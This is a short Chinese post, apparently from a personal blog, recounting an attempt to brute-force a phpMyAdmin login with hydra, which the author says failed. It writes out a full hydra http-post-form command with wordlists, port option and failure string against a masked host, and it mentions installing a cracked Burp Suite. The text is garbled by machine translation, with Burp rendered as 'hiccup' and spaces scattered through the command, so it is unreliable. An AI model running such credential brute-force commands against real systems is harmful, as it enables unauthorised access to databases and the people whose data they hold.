在github上找字典,或者用kali自己的字典。
找到打嗝搶到包後的網址和錯誤信息,根據hydra的語法寫下句子。
困擾了很久的壹點是,初始掃描無法成功,因為只寫ip不改端口。結果我壹直在掃描壹個404頁面。
-s選項可以更改端口。
最終命令:
hydra-l top 20 _ admin _ users . txt-p fast PWDs . txt-v-t 4-e ns-f-s 88 xx . xx . xx . xx http-post-form " /xxx:xxx=^user^&;xxx=^pass^&;服務器= 1 & amp;token = 2 bbde 9 ea 85 a 0 AC 2 da 88 DD 37 a84c 63d 57:# 1045無法登錄MySQL服務器"
奇怪的是,每次測試都很成功。使用代理後,發現發送的請求非常奇怪,無法獲得正確的包。
用burpsuite代替,參考別人的文章後安裝破解版的burpsuite,發現這個東西非常容易被用於web攻擊。
Phpmyadmin有防禦機制。在將第壹個包發送到後臺後,它將使用cookie中加密的用戶名和密碼重新發送get請求。找不到解決方案。最終破解失敗。
有問題可以私信我。